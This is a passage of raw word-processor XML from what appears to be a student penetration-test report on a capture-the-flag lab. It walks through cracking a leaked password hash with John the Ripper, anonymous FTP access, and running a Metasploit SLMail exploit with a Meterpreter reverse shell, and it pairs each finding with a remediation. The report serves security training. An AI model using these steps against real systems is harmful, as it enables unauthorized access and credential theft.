              <w:t xml:space="preserve"> from the flag before. After setting the RHOSTS i used the command run to connect. Next I ran the command ls -l to get the list in the directory to see if I saw any indication of a flag. Next i ran the command find / -type f -iname “*flag*” to search the files for any files with flags in them. After successfully locating some files with flags in them I used the command cd /root to change to the root directory then I used the command cat .flag7.txt to reveal the flag.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">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1FB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="32131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6577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="3629025" cy="2505075"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="3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629025" cy="2505075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1524000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="3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6577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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2070100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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65772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4210050" cy="2952750"/>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210050" cy="295275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F">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200">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">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202">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Update apache struts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ft98cc3eh3ql" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Findings Day 3</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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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16">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Unprotected User Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">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21C">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i went to the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> page of github by going to </w:t>
            </w:r>
            <w:hyperlink r:id="rId30">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/totalrekall/site</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> went under xampp.users where it shows the username and a undecoded hash text. I then downloaded that as a text file to the desktop of the VM. I turned to kali and navigated to my desktop using command cd /Desktop, performed ls to make sure the text file showed, then I used the command john xampp.users and it gave me the password </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tanya4life</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> which is Flag 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">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2603500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="50"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465772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2298700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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657725" cy="22987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21">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TotalRekall</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation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credential needs to be removed from the github website</w:t>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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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8">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29">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Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022B">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t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022D">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E">
            <w:pPr>
              <w:widowControl w:val="0"/>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22F">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I ran the command nmap 172.22.117.0/24 and it gave me 172.22.117.20 for the http and https as the ports are open. I opened a browser and went to 172.22.117.20 where it prompted me to login and I used the login credentials I found from Flag 1 and it gave me Flag 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3924300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="43"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4657725" cy="3924300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2413000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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657725" cy="2413000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1739900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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657725" cy="1739900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2070100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="51"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4657725" cy="20701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3">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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">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236">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict public access to credentials and enforce two-factor authentication</w:t>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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">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B">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23C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023D">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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023F">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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000241">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">I ran the command ftp 172.22.117.20 to connect to the ftp server, It then asked for a username and password and per the internet for the username you can use anonymous and the password you can leave blank. From there I ran the ls command to see what was listed. It shows flag3 in txt form and </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">used</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> the command get Flag3.txt. I then exit from the ftp server so I can use the command cat Flag3.txt to get the next flag.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3517900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="47"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4657725" cy="3517900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1371600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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6577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6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">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249">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using FTPS or SFTP instead of FTP, as they offer enhanced security. FTP is susceptible to threats such as sniffing, spoofing, and brute force attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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D">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4E">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24F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SLMail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000250">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">I started off by running the command nmap -A 172.22.117.20 to see the open ports that can be exploited. I then found per an internet search that port 110 that's open is known as a buffer overflow vulnerability. From there I ran msfconsole to get into the metasploit framework. The next command was search </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">slmail</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to bring up the exploit i will be using then I ran the command use 0 to default to windows/meterpreter/reverse_tcp so once I'm done configuring the system I can run it into </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. I then ran the options command to see what my LHOST and RHOSTS were set to the correct ip addresses. As they were both not set correctly I ran the command set LHOST 172.22.117.100 because thats the ip address of the attacking machine and ran the command set RHOSTS to 172.22.117.20 as this is the ip address of the target machine. I then ran the command run so the machine would configure and put me into the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. I then ran the command ls to see the files and the first file contained flag 4 in txt form so I ran command cat flag4.txt to see the flag inside of the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3276600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="36"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657725" cy="3276600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="2143125" cy="809625"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="28"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143125" cy="809625"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1181100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="25"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657725" cy="1181100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2667000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="44"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4657725" cy="2667000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
